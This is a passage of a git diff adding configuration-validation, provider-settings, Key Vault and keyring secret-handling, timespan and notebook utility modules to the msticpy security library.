+            mp_config=mp_config.get(conf_section, {}),
+            section=conf_section,
+            key_provs=auth_key_providers,
+        )
+        if conf_section == _DP_KEY and mp_config.get(conf_section) is None:
+            continue
+        mp_errors.extend(prov_errors)
+        mp_warn.extend(prov_warn)
+
+    _print_validation_report(mp_errors, mp_warn)
+    if mp_errors or mp_warn:
+        return mp_errors, mp_warn
+    return [], []
+
+
+def _print_validation_report(mp_errors, mp_warn):
+    if mp_errors:
+        _print_validation_item(
+            "\nThe following configuration errors were found:", mp_errors
+        )
+
+    else:
+        print("No errors found.")
+    if mp_warn:
+        _print_validation_item(
+            "\nThe following configuration warnings were found:", mp_warn
+        )
+
+    else:
+        print("No warnings found.")
+
+
+def _print_validation_item(arg0, arg1):
+    title = arg0
+    print(title, "\n", "-" * len(title))
+    for err in arg1:
+        print(err)
+
+
+def _validate_azure_sentinel(mp_config):
+    mp_errors = []
+    mp_warnings = []
+    as_settings = mp_config.get(_AZ_SENTINEL, {})
+    if not as_settings:
+        mp_errors.append("Missing or empty 'AzureSentinel' section")
+        return mp_errors, mp_warnings
+    ws_settings = as_settings.get("Workspaces", {})
+    if not ws_settings:
+        mp_errors.append("Missing or empty 'Workspaces' key in 'AzureSentinel' section")
+        return mp_errors, mp_warnings
+    no_default = True
+    for ws, ws_settings in ws_settings.items():
+        if ws == "Default":
+            no_default = False
+        ws_id = ws_settings.get("WorkspaceId")
+        if not (ws_id and is_valid_uuid(ws_id)):
+            mp_errors.append(f"Invalid GUID for WorkspaceId in {ws} section")
+        ten_id = ws_settings.get("TenantId")
+        if not (ten_id and is_valid_uuid(ten_id)):
+            mp_errors.append(f"Invalid GUID for TenantId in {ws} section")
+    mp_warnings = ["No default workspace set"] if no_default else []
+    return mp_errors, mp_warnings
+
+
+def _check_provider_settings(mp_config, section, key_provs):
+    mp_errors = []
+    mp_warnings = []
+    if not mp_config:
+        mp_warnings.append(f"'{section}' section has no settings.")
+        return mp_errors, mp_warnings
+    for p_name, p_setting in mp_config.items():
+        if not p_setting:
+            mp_warnings.append(f"'{section}/{p_name}' sub-section has no settings.")
+            continue
+        if "Args" not in p_setting:
+            continue
+        sec_args = p_setting.get("Args")
+        if not sec_args or not isinstance(sec_args, dict):
+            mp_errors.append(
+                f"'{section}/{p_name}/{sec_args}' key has no settings or "
+                + "is not a valid format."
+            )
+            continue
+        sec_path = f"{section}/{p_name}" if section else f"{p_name}"
+        mp_errors.extend(
+            _check_required_provider_settings(sec_args, sec_path, p_name, key_provs)
+        )
+
+        mp_errors.extend(
+            _check_env_vars(args_key=p_setting.get("Args"), section=sec_path)
+        )
+    return mp_errors, mp_warnings
+
+
+def _check_required_provider_settings(sec_args, sec_path, p_name, key_provs):
+    errs = []
+    if key_provs and p_name in key_provs:
+        errs.append(_check_required_key(sec_args, "AuthKey", sec_path))
+    if p_name == "XForce":
+        errs.append(_check_required_key(sec_args, "ApiID", sec_path))
+    if p_name == _AZ_SENTINEL:
+        errs.append(_check_is_uuid(sec_args, "WorkspaceID", sec_path))
+        errs.append(_check_is_uuid(sec_args, "TenantID", sec_path))
+    if p_name.startswith("AzureSentinel_"):
+        errs.append(_check_is_uuid(sec_args, "WorkspaceId", sec_path))
+        errs.append(_check_is_uuid(sec_args, "TenantId", sec_path))
+    if (
+        p_name == _AZ_CLI
+        and "clientId" in sec_args
+        and sec_args["clientId"] is not None
+    ):
+        # only warn if partially filled - since these are optional
+        errs.append(_check_required_key(sec_args, "clientId", sec_path))
+        errs.append(_check_required_key(sec_args, "tenantId", sec_path))
+        errs.append(_check_required_key(sec_args, "clientSecret", sec_path))
+    if p_name == "RiskIQ":
+        errs.append(_check_required_key(sec_args, "ApiID", sec_path))
+        errs.append(_check_required_package("passivetotal", sec_path))
+    return [err for err in errs if err]
+
+
+def _check_required_key(conf_section, key, sec_path):
+    if key not in conf_section or not conf_section.get(key):
+        return f"{sec_path}: Missing or invalid {key}."
+    return None
+
+
+def _check_required_package(package, sec_path):
+    if find_spec(package) is None:
+        return f"{sec_path}: Required package '{package}' is not installed."
+    return None
+
+
+def _check_is_uuid(conf_section, key, sec_path):
+    if (
+        key not in conf_section
+        or not conf_section[key]
+        or not is_valid_uuid(conf_section[key])
+    ):
+        return f"{sec_path}: Missing or invalid {key}."
+    return None
+
+
+def _check_env_vars(args_key, section):
+    mp_errs = []
+    if not args_key:
+        return mp_errs
+    for val in args_key.values():
+        if not val:
+            continue
+        if isinstance(val, dict) and "EnvironmentVar" in val:
+            env_name = val.get("EnvironmentVar")
+            if not env_name:
+                mp_errs.append(f"{section}: No environment variable name specified.")
+            elif env_name not in os.environ:
+                mp_errs.append(f"{section}: Env variable {env_name} not set.")
+            elif not os.environ[env_name]:
+                mp_errs.append(f"{section}: Env variable {env_name} value is not set.")
+    return mp_errs
+
+
+# Set get_config function in exceptions module
+# so that it can be called without having a circular import
+# pylint: disable=protected-access
+exceptions._get_config = get_config
diff --git a/msticpy/common/provider_settings.py b/msticpy/common/provider_settings.py
new file mode 100644
index 000000000..850b45049
--- /dev/null
+++ b/msticpy/common/provider_settings.py
@@ -0,0 +1,233 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Helper functions for configuration settings."""
+from collections import UserDict
+import os
+from typing import Any, Dict, Optional, Union, Callable
+import warnings
+
+import attr
+from attr import Factory
+
+from .._version import VERSION
+from .exceptions import MsticpyImportExtraError
+from . import pkg_config as config
+
+try:
+    from .secret_settings import SecretsClient
+
+    _SECRETS_ENABLED = True
+except ImportError:
+    _SECRETS_ENABLED = False
+
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-few-public-methods, too-many-ancestors
+class ProviderArgs(UserDict):
+    """ProviderArgs dictionary."""
+
+    def __getitem__(self, key):
+        """Return key value via SecretsClient.read_secret."""
+        if key not in self.data:
+            raise KeyError(key)
+        if _SECRETS_ENABLED:
+            return SecretsClient.read_secret(self.data[key])
+        return self.data[key]
+
+
+@attr.s(auto_attribs=True)
+class ProviderSettings:
+    """Provider settings."""
+
+    name: str
+    description: str
+    provider: Optional[str] = None
+    args: ProviderArgs = Factory(ProviderArgs)  # type: ignore
+    primary: bool = False
+
+
+# pylint: enable=too-few-public-methods, too-many-ancestors
+
+
+_SECRETS_CLIENT: Any = None
+if "KeyVault" in config.settings and config.settings["KeyVault"] and _SECRETS_ENABLED:
+    _SECRETS_CLIENT = SecretsClient()
+
+
+def get_provider_settings(config_section="TIProviders") -> Dict[str, ProviderSettings]:
+    """
+    Read Provider settings from package config.
+
+    Parameters
+    ----------
+    config_section : str, optional
+        [description], by default "TIProviders"
+
+    Returns
+    -------
+    Dict[str, ProviderSettings]
+        Provider settings indexed by provider name.
+
+    """
+    # pylint: disable=global-statement
+    global _SECRETS_CLIENT
+    # pylint: enable=global-statement
+    if "KeyVault" in config.settings and config.settings["KeyVault"]:
+        if _SECRETS_CLIENT is None and _SECRETS_ENABLED:
+            print(
+                "KeyVault enabled. Secrets access may require additional authentication."
+            )
+            _SECRETS_CLIENT = SecretsClient()
+    else:
+        _SECRETS_CLIENT = None
+    section_settings = config.settings.get(config_section)
+    if not section_settings:
+        return {}
+
+    settings = {}
+    for provider, item_settings in section_settings.items():
+        prov_args = item_settings.get("Args")
+        prov_settings = ProviderSettings(
+            name=provider,
+            description=item_settings.get("Description"),
+            args=_get_setting_args(
+                config_section=config_section,
+                provider_name=provider,
+                prov_args=prov_args,
+            ),
+            primary=item_settings.get("Primary", False),
+            provider=item_settings.get("Provider", provider),
+        )
+        settings[provider] = prov_settings
+
+    return settings
+
+
+def reload_settings():
+    """
+    Reload settings from config files.
+
+    Parameters
+    ----------
+    clear_keyring : bool, optional
+        Clears any secrets cached in keyring, by default False
+
+    """
+    config.refresh_config()
+
+
+def _get_setting_args(
+    config_section: str, provider_name: str, prov_args: Optional[Dict[str, Any]]
+) -> ProviderArgs:
+    """Extract the provider args from the settings."""
+    if not prov_args:
+        return ProviderArgs()
+    name_map = {
+        "workspaceid": "workspace_id",
+        "tenantid": "tenant_id",
+        "subscriptionid": "subscription_id",
+    }
+    return _get_settings(
+        config_section=config_section,
+        provider_name=provider_name,
+        conf_group=prov_args,
+        name_map=name_map,
+    )
+
+
+def _get_settings(
+    config_section: str,
+    provider_name: str,
+    conf_group: Optional[Dict[str, Any]],
+    name_map: Optional[Dict[str, str]] = None,
+) -> ProviderArgs:
+    """
+    Lookup configuration values config, environment or KeyVault.
+
+    Parameters
+    ----------
+    config_section : str
+        Configuration section
+    provider_name: str
+        The name of the provider section
+    conf_group : Optional[Dict[str, Any]]
+        The configuration dictionary
+    name_map : Optional[Dict[str, str]], optional
+        Optional mapping to re-write setting names,
+        by default None
+
+    Returns
+    -------
+    ProviderArgs
+        Dictionary of resolved settings
+
+    Raises
+    ------
+    NotImplementedError
+        Keyvault storage is not yet implemented
+
+    """
+    if not conf_group:
+        return ProviderArgs()
+    setting_dict: ProviderArgs = ProviderArgs(conf_group.copy())
+
+    for arg_name, arg_value in conf_group.items():
+        target_name = arg_name
+        if name_map:
+            target_name = name_map.get(target_name.casefold(), target_name)
+
+        if isinstance(arg_value, str):
+            setting_dict[target_name] = arg_value
+        elif isinstance(arg_value, dict):
+            try:
+                setting_dict[target_name] = _fetch_setting(
+                    config_section, provider_name, arg_name, arg_value
+                )  # type: ignore
+            except NotImplementedError:
+                warnings.warn(
+                    f"Setting type for setting {arg_value} not yet implemented. "
+                )
+    return setting_dict
+
+
+def _fetch_setting(
+    config_section: str,
+    provider_name: str,
+    arg_name: str,
+    config_setting: Dict[str, Any],
+) -> Union[Optional[str], Callable[[], Any]]:
+    """Return required value for indirect settings (e.g. getting env var)."""
+    if "EnvironmentVar" in config_setting:
+        env_value = os.environ.get(config_setting["EnvironmentVar"])
+        if not env_value:
+            warnings.warn(
+                f"Environment variable {config_setting['EnvironmentVar']}"
+                + f" (provider {provider_name})"
+                + " was not set"
+            )
+        return env_value
+    if "KeyVault" in config_setting:
+        if not _SECRETS_ENABLED:
+            raise MsticpyImportExtraError(
+                "Cannot use this feature without Key Vault support installed",
+                title="Error importing Loading Key Vault and/or keyring libaries",
+                extra="keyvault",
+            )
+        if not _SECRETS_CLIENT:
+            warnings.warn(
+                "Cannot use a KeyVault configuration setting without"
+                + "a KeyVault configuration section in msticpyconfig.yaml"
+                + f" (provider {provider_name})"
+            )
+            return None
+        config_path = [config_section, provider_name, "Args", arg_name]
+        return _SECRETS_CLIENT.get_secret_accessor(  # type:ignore
+            ".".join(config_path)
+        )
+    return None
diff --git a/msticpy/common/secret_settings.py b/msticpy/common/secret_settings.py
new file mode 100644
index 000000000..88286b6ee
--- /dev/null
+++ b/msticpy/common/secret_settings.py
@@ -0,0 +1,274 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Settings provider for secrets."""
+import random
+import re
+from functools import partial
+from typing import Any, Callable, Dict, Optional, Set, Tuple
+
+import keyring
+from keyring.errors import KeyringError, KeyringLocked, NoKeyringError
+
+from .._version import VERSION
+from . import pkg_config as config
+from .exceptions import MsticpyKeyVaultConfigError
+from .keyvault_client import BHKeyVaultClient
+from .keyvault_settings import KeyVaultSettings
+from .utility import export
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+@export
+class KeyringClient:
+    """Keyring client wrapper."""
+
+    def __init__(self, name: str = "key-cache", debug: bool = False):
+        """
+        Initialize the keyring client.
+
+        Parameters
+        ----------
+        name : str, optional
+            Name of the credential group, by default "key-cache"
+        debug : bool, optional
+            Output debug info, by default False
+
+        """
+        self.debug = debug
+        self.keyring = name
+        self._secret_names: Set[str] = set()
+
+    def __getitem__(self, key: str):
+        """Get key name."""
+        cred = self.get_secret(key)
+        if cred:
+            return cred
+        raise KeyError
+
+    def get_secret(self, secret_name: str) -> Any:
+        """
+        Retrieve a secret from the keyring.
+
+        Parameters
+        ----------
+        secret_name : str
+            Secret name.
+
+        Returns
+        -------
+        Any
+            Secret value.
+
+        """
+        secret = None
+        if self.debug:
+            print(f"Fetching {secret_name} from keyring")
+        try:
+            secret = keyring.get_password(self.keyring, secret_name)
+        except (KeyringError, KeyringLocked):
+            if self.debug:
+                print(
+                    "Keyring error retrieving credentials",
+                    f"for {secret_name} from keyring {self.keyring}",
+                )
+        if not secret and self.debug:
+            print("No credentials", f"for {secret_name} from keyring {self.keyring}")
+        return secret
+
+    def set_secret(self, secret_name: str, secret_value: Any):
+        """
+        Set a secret in the keyring group.
+
+        Parameters
+        ----------
+        secret_name : str
+            Name of the secret
+        secret_value : Any
+            Secret value
+
+        """
+        if self.debug:
+            print(f"Saving {secret_name} to keyring {self.keyring}")
+        self._secret_names.add(secret_name)
+        keyring.set_password(self.keyring, secret_name, secret_value)
+
+    @staticmethod
+    def is_keyring_available() -> bool:
+        """
+        Test if valid keyring backend is available.
+
+        Returns
+        -------
+        bool
+            True if Keyring has a usable backend, False if not.
+
+        """
+        char_list = list("abcdefghijklm1234567890")
+        random.shuffle(char_list)
+        test_value = "".join(char_list)
+        try:
+            keyring.set_password("test", test_value, test_value)
+            # If no exception clear the test key
+            try:
+                keyring.delete_password("test", test_value)
+            except keyring.errors.PasswordDeleteError:
+                pass
+            return True
+        except NoKeyringError:
+            return False
+
+
+@export
+class SecretsClient:
+    """Secrets client - manages keyvault and keyring secrets."""
+
+    def __init__(self, tenant_id: str = None, use_keyring: bool = False):
+        """
+        Initialize SecretsClient instance.
+
+        Parameters
+        ----------
+        tenant_id : str, optional
+            TenantID, by default None
+        use_keyring : bool, optional
+            If True use keyring to cache secrets, by default False
+
+        Raises
+        ------
+        MsticpyKeyVaultConfigError
+            Missing or invalid configuration settings.
+
+        Notes
+        -----
+        Requires KeyVault settings to be defined in msticpyconfig.yaml
+
+        """
+        self._kv_settings = KeyVaultSettings()
+
+        self.tenant_id = tenant_id or self._kv_settings.get("tenantid")
+        if not self.tenant_id:
+            raise MsticpyKeyVaultConfigError(
+                "Could not get TenantId from function parameters or configuration.",
+                "Please add this to the KeyVault section of msticpyconfig.yaml",
+                title="missing tenant ID value.",
+            )
+        self.kv_secret_vault: Dict[str, str] = {}
+        self.kv_vaults: Dict[str, BHKeyVaultClient] = {}
+        self._use_keyring = use_keyring or self._kv_settings.get("UseKeyring", False)
+        self._use_keyring = self._use_keyring and KeyringClient.is_keyring_available()
+        if self._use_keyring:
+            self._keyring_client = KeyringClient("Providers")
+
+    def get_secret_accessor(self, setting_path: str) -> Callable[[], Any]:
+        """
+        Return accessor function for a secret.
+
+        Parameters
+        ----------
+        setting_path : str
+            The msticpy configuration path (dot-separated)
+
+        Returns
+        -------
+        Callable[[None], Any]
+            Accessor function for the secret value.
+
+        """
+        vault_name, secret_name = self._get_kv_vault_and_name(setting_path)
+        if vault_name is None or secret_name is None:
+            return lambda: secret_name if secret_name else ""
+        return self._get_secret_func(secret_name, vault_name)
+
+    def _add_key_vault(self, vault_name: str, secret_name: str):
+        """Add the KeyVault instance responsible for storing `secret_name`."""
+        vault = self.kv_vaults.get(vault_name)
+        if not vault:
+            vault = BHKeyVaultClient(self.tenant_id, vault_name=vault_name)
+            self.kv_vaults[vault_name] = vault
+        self.kv_secret_vault[secret_name] = vault_name
+
+    @staticmethod
+    def format_kv_name(setting_path):
+        """Return normalized name for use as a KeyVault secret name."""
+        return re.sub("[^0-9a-zA-Z-]", "-", setting_path)
+
+    def _get_kv_vault_and_name(
+        self, setting_path: str
+    ) -> Tuple[Optional[str], Optional[str]]:
+        """Return the vault and secret name for a config path."""
+        setting_item = config.get_config(setting_path)
+
+        if not isinstance(setting_item, dict):
+            return None, str(setting_item)
+        if "KeyVault" in setting_item:
+            kv_val = setting_item.get("KeyVault")
+            def_vault_name = self._kv_settings.get("VaultName")
+            if not kv_val or kv_val.casefold() == "default":
+                # If no value, get the default VaultName from settings
+                # and use the setting path as the secret name
+                if not def_vault_name:
+                    raise ValueError("No VaultName defined in KeyVault settings.")
+                secret_name = self.format_kv_name(setting_path)
+                return def_vault_name, secret_name
+            if "/" in kv_val:
+                # '/' delimited string means VaultName/Secret
+                vault_name, secret_name = kv_val.split("/")
+                return vault_name, self.format_kv_name(secret_name)
+            if not def_vault_name:
+                raise MsticpyKeyVaultConfigError(
+                    "Check that you have specified the right value for VaultName"
+                    + " in your configuration",
+                    f"No VaultName defined in KeyVault settings for {setting_path}.",
+                    title="Key Vault vault name not found.",
+                )
+            # If there is a single string - take that as the secret name
+            return def_vault_name, self.format_kv_name(kv_val)
+        return None, None
+
+    def _get_secret_func(self, secret_name: str, vault_name: str) -> Callable[[], Any]:
+        """Return a func to access a secret."""
+        if self._use_keyring and self._keyring_client.get_secret(secret_name):
+            return self._create_secret_func(self._keyring_client, secret_name)
+
+        # If the secret is not in keyring, get the vault holding this secret
+        if not self.kv_secret_vault.get(secret_name):
+            self._add_key_vault(secret_name=secret_name, vault_name=vault_name)
+
+        vault = self.kv_vaults[vault_name]
+        if self._use_keyring:
+            # store the secret in keyring and return an accessor
+            # to the keyring value.
+            self._keyring_client.set_secret(secret_name, vault.get_secret(secret_name))
+            return self._create_secret_func(self._keyring_client, secret_name)
+        # if not using Keyring - return a KeyVault accessor
+        return self._create_secret_func(vault, secret_name)
+
+    @staticmethod
+    def _create_secret_func(secret_store, secret_name):
+        return partial(secret_store.get_secret, secret_name=secret_name)
+
+    @staticmethod
+    def read_secret(secret_object: Any) -> Any:
+        """
+        Return the secret value.
+
+        Parameters
+        ----------
+        secret_object : Any
+            If it is a func, call and return the return value
+            of that func. Otherwise just return the object.
+
+        Returns
+        -------
+        Any
+            The secret value
+
+        """
+        if callable(secret_object):
+            return secret_object()
+        return secret_object
diff --git a/msticpy/common/timespan.py b/msticpy/common/timespan.py
new file mode 100644
index 000000000..302625be9
--- /dev/null
+++ b/msticpy/common/timespan.py
@@ -0,0 +1,178 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Timespan class."""
+from datetime import datetime, timedelta
+from typing import Any, Optional, Tuple, Union
+
+import pandas as pd
+from dateutil.parser import ParserError  # type: ignore
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class TimeSpan:
+    """Timespan parameter for notebook modules."""
+
+    # pylint: enable=too-many-branches
+    def __init__(
+        self,
+        timespan: Optional[Union["TimeSpan", Tuple[Any, Any], Any]] = None,
+        start: Optional[Union[datetime, str]] = None,
+        end: Optional[Union[datetime, str]] = None,
+        period: Optional[Union[timedelta, str]] = None,
+    ):
+        """
+        Initialize Timespan.
+
+        Parameters
+        ----------
+        timespan : Union(TimeSpan, Tuple(Any, Any), Any), optional
+            A TimeSpan object
+            or a tuple of datetimes or datetime strings,
+            or an object that has either `start` and `end` or `start` and
+            `period` date_time-like attributes.
+            By default None
+        start : Optional[Union[datetime, str]], optional
+            datetime of the start of the time period, by default None
+        end : Optional[Union[datetime, str]], optional
+            datetime of the end of the time period, by default utcnow
+        period : Optional[Union[timedelta, str]], optional
+            duration of the period, by default None
+
+        Raises
+        ------
+        ValueError
+            If neither `start` nor `period` are specified.
+
+        """
+        start, end, period = self._process_args(timespan, start, end, period)
+
+        if not start and not period:
+            raise ValueError(
+                "start, period",
+                "At least one of 'start' or 'period' must be specified.",
+            )
+
+        self._period = None
+        if period:
+            self._period = self._parse_timedelta(period)
+
+        self._end = self._parse_time(end, "end")
+        self._start = self._parse_time(start, "start")
+        if self._start and self._period:
+            self._end = self._start + self._period
+        if self._end is None:
+            self._end = datetime.utcnow()
+        if self._start is None and self._period:
+            self._start = self._end - self._period
+
+    def __eq__(self, value):
+        """Return True if the timespans are equal."""
+        if not isinstance(value, TimeSpan):
+            return False
+        return self.start == value.start and self.end == value.end
+
+    def __hash__(self):
+        """Return the hash of the timespan."""
+        return hash((self.start, self.end))
+
+    def __repr__(self):
+        """Return repr string."""
+        return (
+            f"{self.__class__.__name__}"
+            f"(start={self.start}, end={self.end}, period={self.period})"
+        )
+
+    @property
+    def start(self) -> datetime:
+        """
+        Return the start of the timeperiod.
+
+        Returns
+        -------
+        datetime
+            Start datetime.
+
+        """
+        return self._start
+
+    @property
+    def end(self) -> datetime:
+        """
+        Return the end of the timeperiod.
+
+        Returns
+        -------
+        datetime
+            End datetime.
+
+        """
+        return self._end
+
+    @property
+    def period(self) -> timedelta:
+        """
+        Return the period of the timeperiod.
+
+        Returns
+        -------
+        timedelta
+            Period timedelta.
+
+        """
+        if not self._period:
+            self._period = self.end - self.start
+        return self._period
+
+    @staticmethod
+    def _process_args(timespan, start, end, period):
+        if timespan:
+            if isinstance(timespan, TimeSpan):
+                start = timespan.start
+                end = timespan.end
+                period = timespan.period
+            elif isinstance(timespan, tuple):
+                start = timespan[0]
+                end = timespan[1]
+        if not start and hasattr(timespan, "start"):
+            start = getattr(timespan, "start", None)
+        if not end and hasattr(timespan, "end"):
+            end = getattr(timespan, "end", None)
+        if not period and hasattr(timespan, "period"):
+            period = getattr(timespan, "period", None)
+        return start, end, period
+
+    @staticmethod
+    def _parse_time(time_val, prop_name):
+        if time_val is None:
+            return None
+        if isinstance(time_val, datetime):
+            return time_val
+        try:
+            if isinstance(time_val, str):
+                return pd.to_datetime(time_val, infer_datetime_format=True)
+        except (ValueError, ParserError):
+            pass
+        raise ValueError(f"'{prop_name}' must be a datetime or a datetime string.")
+
+    @staticmethod
+    def _parse_timedelta(time_val):
+        if time_val is None:
+            return None
+        if isinstance(time_val, timedelta):
+            return time_val
+        try:
+            if isinstance(time_val, str):
+                return pd.Timedelta(time_val).to_pytimedelta()
+        except (ValueError, ParserError):
+            pass
+        raise ValueError(
+            "'period' must be a pandas-compatible time period string",
+            " or Python timedelta.",
+        )
diff --git a/msticpy/common/utility.py b/msticpy/common/utility.py
new file mode 100644
index 000000000..b7f34a6cb
--- /dev/null
+++ b/msticpy/common/utility.py
@@ -0,0 +1,621 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Miscellaneous helper methods for Jupyter Notebooks."""
+import builtins
+import difflib
+import os
+import re
+import subprocess  # nosec
+import sys
+import uuid
+import warnings
+from enum import Enum
+from pathlib import Path
+from typing import (
+    Any,
+    Callable,
+    Dict,
+    Iterable,
+    List,
+    Optional,
+    Tuple,
+    Type,
+    TypeVar,
+    Union,
+)
+from platform import python_version
+
+import pkg_resources
+from IPython import get_ipython
+from IPython.display import HTML, display, DisplayHandle
+from tqdm.auto import tqdm
+from tqdm.notebook import tqdm as tqdm_notebook
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def export(func: Callable):
+    """Decorate function or class to export to __all__."""
+    mod = sys.modules[func.__module__]
+    if hasattr(mod, "__all__"):
+        all_list = getattr(mod, "__all__")
+        all_list.append(func.__name__)
+    else:
+        all_list = [func.__name__]
+        setattr(mod, "__all__", all_list)
+    return func
+
+
+@export
+def string_empty(string: str) -> bool:
+    """Return True if the input string is None or whitespace."""
+    return not (bool(string) or isinstance(string, str) and bool(string.strip()))
+
+
+@export
+def is_not_empty(test_object: Any) -> bool:
+    """Return True if the test_object is not None or empty."""
+    if test_object:
+        if isinstance(test_object, str):
+            if test_object.strip():
+                # test_object is not None AND myString is not empty or blank
+                return True
+            return False
+        return True
+    return False
+
+
+# String escapes
+@export
+def escape_windows_path(str_path: str) -> str:
+    """Escape backslash characters in a string."""
+    if is_not_empty(str_path):
+        return str_path.replace("\\", "\\\\")
+    return str_path
+
+
+@export
+def unescape_windows_path(str_path: str) -> str:
+    """Remove escaping from backslash characters in a string."""
+    if is_not_empty(str_path):
+        return str_path.replace("\\\\", "\\")
+    return str_path
+
+
+@export
+def check_py_version(min_ver: Tuple = (3, 6)):
+    """
+    Check that the current python version is not less than `min_ver`.
+
+    Parameters
+    ----------
+    min_ver : Tuple, optional
+        Minimum required version, by default (3,6)
+
+    """
+    if isinstance(min_ver, (float, str)):
+        min_ver_list = str(min_ver).split(".")
+        min_ver = (int(min_ver_list[0]), int(min_ver_list[1]))
+    if sys.version_info < min_ver:
+        print("Check the Kernel->Change Kernel menu and ensure that Python 3.6")
+        print("or later is selected as the active kernel.")
+        raise SystemExit(f"Python {min_ver[0]}.{min_ver[1]} or later is required.\n")
+
+
+@export
+def resolve_pkg_path(part_path: str):
+    """
+    Resolve a path relative to the package.
+
+    Parameters
+    ----------
+    part_path : str
+        Absolute or relative path to resolve.
+
+    """
+    if Path(part_path).is_absolute():
+        return part_path
+
+    resolved_path = str(Path(__file__).resolve().parent.parent.joinpath(part_path))
+    if Path(resolved_path).exists():
+        return str(resolved_path)
+
+    searched_paths = list(
+        Path(__file__).resolve().parent.parent.glob(str(Path("**").joinpath(part_path)))
+    )
+    if not searched_paths or len(searched_paths) > 1:
+        warnings.warn(f"No path or ambiguous match for {part_path} not found")
+        return None
+    return str(searched_paths[0])
+
+
+# pylint: disable=not-an-iterable, too-many-branches
+@export  # noqa: MC0001
+def check_and_install_missing_packages(  # noqa: MC0001
+    required_packages: List[str],
+    force_notebook: bool = False,
+    user: bool = False,
+    upgrade: bool = False,
+) -> bool:
+    """
+    Check and install missing packages from provided list of packages.
+
+    Parameters
+    ----------
+    required_packages : List[str]
+        List of packages to check and install in a current environment
+        Note you can add package version constraints by appending them to
+        the package name, e.g. `pandas>=1.01`
+    force_notebook : bool, optional
+        Boolean value to force notebook version of progress bar,
+        by default False (autodetect)
+    user : bool, optional
+        Boolean value to toggle user flag while installing pip packages,
+        by default False
+    upgrade: bool, option
+        If true supply `--upgrade` flag to pip to install the latest
+        version (applies to all package in `required_packages`)
+
+    Returns
+    -------
+    bool :
+        True if successful, else False
+
+    """
+    missing_packages = []
+    if isinstance(required_packages, str):
+        if "," in required_packages:
+            required_packages = [
+                req.strip() for req in required_packages.split(",") if req.strip()
+            ]
+        else:
+            required_packages = [required_packages]
+    # Check package requirements against installed set
+    for req in required_packages:
+        pkg_req = pkg_resources.Requirement.parse(req)
+        try:
+            found_pkg = pkg_resources.working_set.find(pkg_req)
+        except pkg_resources.VersionConflict:
+            found_pkg = None
+        if found_pkg is None:
+            missing_packages.append(req)
+
+    if not missing_packages:
+        print("All packages are already installed")
+        return True
+
+    print("Missing packages to be installed: ", *missing_packages, sep=" ")
+    if is_ipython() or force_notebook:
+        pkgbar = tqdm_notebook(missing_packages, desc="Installing...", unit="bytes")
+    else:
+        pkgbar = tqdm(missing_packages, desc="Installing...", unit="bytes")
+
+    pkg_command = ["install"] if is_ipython() else ["python", "-m", "pip", "install"]
+    if user:
+        pkg_command.append("--user")
+    if upgrade:
+        pkg_command.append("--upgrade")
+    pkg_success = True
+    for package in pkgbar:
+        if is_ipython():
+            get_ipython().run_line_magic("pip", " ".join(pkg_command + [package]))
+        else:
+            try:
+                subprocess.run(  # nosec
+                    pkg_command + [package],
+                    check=True,
+                    stdout=subprocess.PIPE,
+                    stderr=subprocess.PIPE,
+                )
+            except subprocess.CalledProcessError as proc_err:
+                print(f"An Error has occurred while installing {package}.")
+                print(f"Output: {proc_err.stdout}")
+                print(f"Errs: {proc_err.stderr}")
+                pkg_success = False
+        print(f"{package} installed.")
+
+    return pkg_success
+
+
+# pylint: enable=not-an-iterable, too-many-branches
+
+
+# pylint: disable=invalid-name
+@export
+def md(
+    string: str,
+    styles: Union[str, Iterable[str]] = None,
+    disp_id: Optional[Union[bool, DisplayHandle]] = None,
+) -> DisplayHandle:
+    """
+    Display a string as Markdown with optional style.
+
+    Parameters
+    ----------
+    string : str
+        The string to display
+    styles : Union[str, Iterable[str]], optional
+        A style mnemonic or collection of styles. If multiple styles,
+        these can be supplied as an interable of strings or a comma-separated
+        string, by default None
+    disp_id : Optional[Union[bool, DisplayHandle]], optional
+        If True, the function will return a display handle that can be re-used
+        in subsequent calls to update the display object.
+        If this is previously-created display handle, this is used as the
+        target display object to update it with the content of this call,
+        by default None
+
+    Returns
+    -------
+    DisplayHandle
+        A handle to the display object that can be used to update the
+        contents.
+
+    """
+    style_str = ""
+    if isinstance(styles, str):
+        if "," in styles:
+            styles = [style.strip() for style in styles.split(",")]
+        else:
+            style_str = _F_STYLES.get(styles, "")
+    if isinstance(styles, list):
+        style_str = ";".join(_F_STYLES.get(style, "") for style in styles)
+    content = HTML(f"<p style='{style_str}'>{string}</p>")
+
+    if isinstance(disp_id, bool) and disp_id:
+        return display(content, display_id=True)
+    if isinstance(disp_id, DisplayHandle):
+        return disp_id.update(content)
+    display(content)
+    return None
+
+
+# pylint: enable=invalid-name
+
+
+@export
+def md_warn(string: str, disp_id: Optional[DisplayHandle] = None):
+    """
+    Return string as a warning - orange text prefixed by "Warning".
+
+    Parameters
+    ----------
+    string : str
+        The warning message.
+    disp_id : Optional[DisplayHandle], optional
+        If True, the function will return a display handle that can be re-used
+        in subsequent calls to update the display object.
+        If this is previously-created display handle, this is used as the
+        target display object to update it with the content of this call,
+        by default None
+
+    Returns
+    -------
+    DisplayHandle
+        A handle to the display object that can be used to update the
+        contents.
+
+    """
+    return md(f"Warning: {string}", "bold, orange, large", disp_id)
+
+
+@export
+def md_error(string: str, disp_id: Optional[DisplayHandle] = None):
+    """
+    Return string as an error - red text prefixed by "Error".
+
+    Parameters
+    ----------
+    string : str
+        The error message.
+    disp_id : Optional[Union[bool, DisplayHandle]], optional
+        If True, the function will return a display handle that can be re-used
+        in subsequent calls to update the display object.
